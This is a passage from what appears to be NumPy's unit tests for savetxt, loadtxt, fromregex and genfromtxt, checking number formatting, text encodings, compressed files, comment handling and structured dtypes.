with temppath() as name:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def test_complex_negative_exponent(self):
# Previous to 1.15, some formats generated x+-yj, gh 7895
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re - 1.0j * im
c = BytesIO()
np.savetxt(c, a, fmt='%.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n',
b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n'])
def test_custom_writer(self):
class CustomWriter(list):
def write(self, text):
self.extend(text.split(b'\n'))
w = CustomWriter()
a = np.array([(1, 2), (3, 4)])
np.savetxt(w, a)
b = np.loadtxt(w)
assert_array_equal(a, b)
def test_unicode(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode)
with tempdir() as tmpdir:
# set encoding as on windows it may not be unicode even on py3
np.savetxt(os.path.join(tmpdir, 'test.csv'), a, fmt=['%s'],
encoding='UTF-8')
def test_unicode_roundtrip(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode)
# our gz wrapper supports encoding
suffixes = ['', '.gz']
# the Python 2 stdlib versions do not support encoding
if MAJVER > 2:
if HAS_BZ2:
suffixes.append('.bz2')
if HAS_LZMA:
suffixes.extend(['.xz', '.lzma'])
with tempdir() as tmpdir:
for suffix in suffixes:
np.savetxt(os.path.join(tmpdir, 'test.csv' + suffix), a,
fmt=['%s'], encoding='UTF-16-LE')
b = np.loadtxt(os.path.join(tmpdir, 'test.csv' + suffix),
encoding='UTF-16-LE', dtype=np.unicode)
assert_array_equal(a, b)
def test_unicode_bytestream(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode)
s = BytesIO()
np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
s.seek(0)
assert_equal(s.read().decode('UTF-8'), utf8 + '\n')
def test_unicode_stringstream(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode)
s = StringIO()
np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
s.seek(0)
assert_equal(s.read(), utf8 + '\n')
class LoadTxtBase(object):
def check_compressed(self, fopen, suffixes):
# Test that we can load data from a compressed file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
for suffix in suffixes:
with temppath(suffix=suffix) as name:
with fopen(name, mode='wt', encoding='UTF-32-LE') as f:
f.write(data)
res = self.loadfunc(name, encoding='UTF-32-LE')
assert_array_equal(res, wanted)
with fopen(name, "rt", encoding='UTF-32-LE') as f:
res = self.loadfunc(f)
assert_array_equal(res, wanted)
# Python 2's gzip/bz2 open does not support encoding
@pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
def test_compressed_gzip(self):
self.check_compressed(gzip.open, ('.gz',))
@pytest.mark.skipif(not HAS_BZ2, reason="Needs bz2")
@pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
def test_compressed_bz2(self):
self.check_compressed(bz2.open, ('.bz2',))
@pytest.mark.skipif(not HAS_LZMA, reason="Needs lzma")
@pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
def test_compressed_lzma(self):
self.check_compressed(lzma.open, ('.xz', '.lzma'))
def test_encoding(self):
with temppath() as path:
with open(path, "wb") as f:
f.write('0.\n1.\n2.'.encode("UTF-16"))
x = self.loadfunc(path, encoding="UTF-16")
assert_array_equal(x, [0., 1., 2.])
def test_stringload(self):
# umlauts
nonascii = b'\xc3\xb6\xc3\xbc\xc3\xb6'.decode("UTF-8")
with temppath() as path:
with open(path, "wb") as f:
f.write(nonascii.encode("UTF-16"))
x = self.loadfunc(path, encoding="UTF-16", dtype=np.unicode)
assert_array_equal(x, nonascii)
def test_binary_decode(self):
utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
v = self.loadfunc(BytesIO(utf16), dtype=np.unicode, encoding='UTF-16')
assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
def test_converters_decode(self):
# test converters that decode strings
c = TextIO()
c.write(b'\xcf\x96')
c.seek(0)
x = self.loadfunc(c, dtype=np.unicode,
converters={0: lambda x: x.decode('UTF-8')})
a = np.array([b'\xcf\x96'.decode('UTF-8')])
assert_array_equal(x, a)
def test_converters_nodecode(self):
# test native string converters enabled by setting an encoding
utf8 = b'\xcf\x96'.decode('UTF-8')
with temppath() as path:
with io.open(path, 'wt', encoding='UTF-8') as f:
f.write(utf8)
x = self.loadfunc(path, dtype=np.unicode,
converters={0: lambda x: x + 't'},
encoding='UTF-8')
a = np.array([utf8 + 't'])
assert_array_equal(x, a)
class TestLoadTxt(LoadTxtBase):
loadfunc = staticmethod(np.loadtxt)
def setup(self):
# lower chunksize for testing
self.orig_chunk = np.lib.npyio._loadtxt_chunksize
np.lib.npyio._loadtxt_chunksize = 1
def teardown(self):
np.lib.npyio._loadtxt_chunksize = self.orig_chunk
def test_record(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments_unicode(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=u'#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_comments_byte(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=b'#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_comments_multiple(self):
c = TextIO()
c.write('# comment\n1,2,3\n@ comment2\n4,5,6 // comment3')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=['#', '@', '//'])
a = np.array([[1, 2, 3], [4, 5, 6]], int)
assert_array_equal(x, a)
def test_comments_multi_chars(self):
c = TextIO()
c.write('/* comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments='/*')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
# Check that '/*' is not transformed to ['/', '*']
c = TextIO()
c.write('*/ comment\n1,2,3,5\n')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, dtype=int, delimiter=',',
comments='/*')
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Testing with an integer instead of a sequence
for int_type in [int, np.int8, np.int16,
np.int32, np.int64, np.uint8, np.uint16,
np.uint32, np.uint64]:
to_read = int_type(1)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=to_read)
assert_array_equal(x, a[:, 1])
# Testing with some crazy custom integer type
class CrazyInt(object):
def __index__(self):
return 1
crazy_int = CrazyInt()
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=crazy_int)
assert_array_equal(x, a[:, 1])
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(crazy_int,))
assert_array_equal(x, a[:, 1])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
# Testing non-ints in usecols
c.seek(0)
bogus_idx = 1.5
assert_raises_regex(
TypeError,
'^usecols must be.*%s' % type(bogus_idx),
np.loadtxt, c, usecols=bogus_idx
)
assert_raises_regex(
TypeError,
'^usecols must be.*%s' % type(bogus_idx),
np.loadtxt, c, usecols=[0, bogus_idx, 0]
)
def test_fancy_dtype(self):
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_str_dtype(self):
# see gh-8033
c = ["str1", "str2"]
for dt in (str, np.bytes_):
a = np.array(["str1", "str2"], dtype=dt)
x = np.loadtxt(c, dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with suppress_warnings() as sup:
sup.filter(message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
# Test using an explicit dtype with an object
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_from_float_hex(self):
# IEEE doubles and floats only, otherwise the float32
# conversion may fail.
tgt = np.logspace(-10, 10, 5).astype(np.float32)
tgt = np.hstack((tgt, -tgt)).astype(float)
inp = '\n'.join(map(float.hex, tgt))
c = TextIO()
c.write(inp)
for dt in [float, np.float32]:
c.seek(0)
res = np.loadtxt(c, dtype=dt)
assert_equal(res, tgt, err_msg="%s" % dt)
def test_from_complex(self):
tgt = (complex(1, 1), complex(1, -1))
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=complex)
assert_equal(res, tgt)
def test_complex_misformatted(self):
# test for backward compatibility
# some complex formats used to generate x+-yj
a = np.zeros((2, 2), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re - 1.0j * im
c = BytesIO()
np.savetxt(c, a, fmt='%.16e')
c.seek(0)
txt = c.read()
c.seek(0)
# misformat the sign on the imaginary part, gh 7895
txt_bad = txt.replace(b'e+00-', b'e00+-')
assert_(txt_bad != txt)
c.write(txt_bad)
c.seek(0)
res = np.loadtxt(c, dtype=complex)
assert_equal(res, a)
def test_universal_newline(self):
with temppath() as name:
with open(name, 'w') as f:
f.write('1 21\r3 42\r')
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
dt = {'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_structure_unpack(self):
txt = TextIO("M 21 72\nF 35 58")
dt = {'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = TextIO()
d.write('0,1,2')
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with suppress_warnings() as sup:
sup.filter(message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
def test_bad_line(self):
c = TextIO()
c.write('1 2 3\n4 5 6\n2 3')
c.seek(0)
# Check for exception and that exception contains line number
assert_raises_regex(ValueError, "3", np.loadtxt, c)
def test_none_as_string(self):
# gh-5155, None should work as string when format demands it
c = TextIO()
c.write('100,foo,200\n300,None,400')
c.seek(0)
dt = np.dtype([('x', int), ('a', 'S10'), ('y', int)])
np.loadtxt(c, delimiter=',', dtype=dt, comments=None) # Should succeed
@pytest.mark.skipif(locale.getpreferredencoding() == 'ANSI_X3.4-1968',
reason="Wrong preferred encoding")
def test_binary_load(self):
butf8 = b"5,6,7,\xc3\x95scarscar\n\r15,2,3,hello\n\r"\
b"20,2,3,\xc3\x95scar\n\r"
sutf8 = butf8.decode("UTF-8").replace("\r", "").splitlines()
with temppath() as path:
with open(path, "wb") as f:
f.write(butf8)
with open(path, "rb") as f:
x = np.loadtxt(f, encoding="UTF-8", dtype=np.unicode)
assert_array_equal(x, sutf8)
# test broken latin1 conversion people now rely on
with open(path, "rb") as f:
x = np.loadtxt(f, encoding="UTF-8", dtype="S")
            expected = [b'5,6,7,\xc3\x95scarscar', b'15,2,3,hello',
                        b'20,2,3,\xc3\x95scar']
            assert_array_equal(x, np.array(expected, dtype="S"))
def test_max_rows(self):
c = TextIO()
c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
max_rows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_max_rows_with_skiprows(self):
c = TextIO()
c.write('comments\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=2)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
assert_array_equal(x, a)
def test_max_rows_with_read_continuation(self):
c = TextIO()
c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
max_rows=2)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
assert_array_equal(x, a)
# test continuation
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([2,1,4,5], int)
assert_array_equal(x, a)
def test_max_rows_larger(self):
        # Test max_rows greater than the number of rows.
c = TextIO()
c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=6)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8], [2, 1, 4, 5]], int)
assert_array_equal(x, a)
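    # Note: skiprows is applied before max_rows starts counting data rows,
    # and a partially consumed file object can simply be read again; a
    # sketch mirroring test_max_rows_with_read_continuation above:
    #     f = TextIO('1,2\n3,4\n5,6')
    #     head = np.loadtxt(f, dtype=int, delimiter=',', max_rows=1)  # [1 2]
    #     rest = np.loadtxt(f, dtype=int, delimiter=',')  # [[3 4] [5 6]]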
class Testfromregex(object):
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
def test_record_unicode(self):
utf8 = b'\xcf\x96'
with temppath() as path:
with open(path, 'wb') as f:
f.write(b'1.312 foo' + utf8 + b' \n1.534 bar\n4.444 qux')
dt = [('num', np.float64), ('val', 'U4')]
x = np.fromregex(path, r"(?u)([0-9.]+)\s+(\w+)", dt, encoding='UTF-8')
a = np.array([(1.312, 'foo' + utf8.decode('UTF-8')), (1.534, 'bar'),
(4.444, 'qux')], dtype=dt)
assert_array_equal(x, a)
regexp = re.compile(r"([0-9.]+)\s+(\w+)", re.UNICODE)
x = np.fromregex(path, regexp, dt, encoding='UTF-8')
assert_array_equal(x, a)
def test_compiled_bytes(self):
regexp = re.compile(b'(\\d)')
c = BytesIO(b'123')
dt = [('num', np.float64)]
a = np.array([1, 2, 3], dtype=dt)
x = np.fromregex(c, regexp, dt)
assert_array_equal(x, a)
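    # Note: np.fromregex maps regex groups to structured-dtype fields
    # positionally, so the pattern needs exactly one group per field; a
    # minimal sketch:
    #     dt = [('num', np.int64), ('val', 'S3')]
    #     arr = np.fromregex(TextIO('1 foo\n2 bar'), r'(\d+)\s+(...)', dt)
    #     # arr['num'] -> [1, 2], arr['val'] -> [b'foo', b'bar']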
#####--------------------------------------------------------------------------
class TestFromTxt(LoadTxtBase):
loadfunc = staticmethod(np.genfromtxt)
def test_record(self):
# Test w/ explicit dtype
data = TextIO('1 2\n3 4')
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
# Test outputting a standard ndarray
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
# Test squeezing to 1D
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
# Test the stripping of comments
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
# Test row skipping
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with suppress_warnings() as sup:
sup.filter(ConversionWarning)
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(
TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
# Test retrieving a header
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.ndfromtxt(data, dtype=None, names=True)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
# Test the automatic definition of the output dtype
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.ndfromtxt(data, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
# Tests whether the output dtype can be uniformized
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
# Check that a nested dtype isn't MIA
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
# Test overwriting the names of the dtype
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
# Check that names can be retrieved even if the line is commented out.
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
with warnings.catch_warnings(record=True) as w:
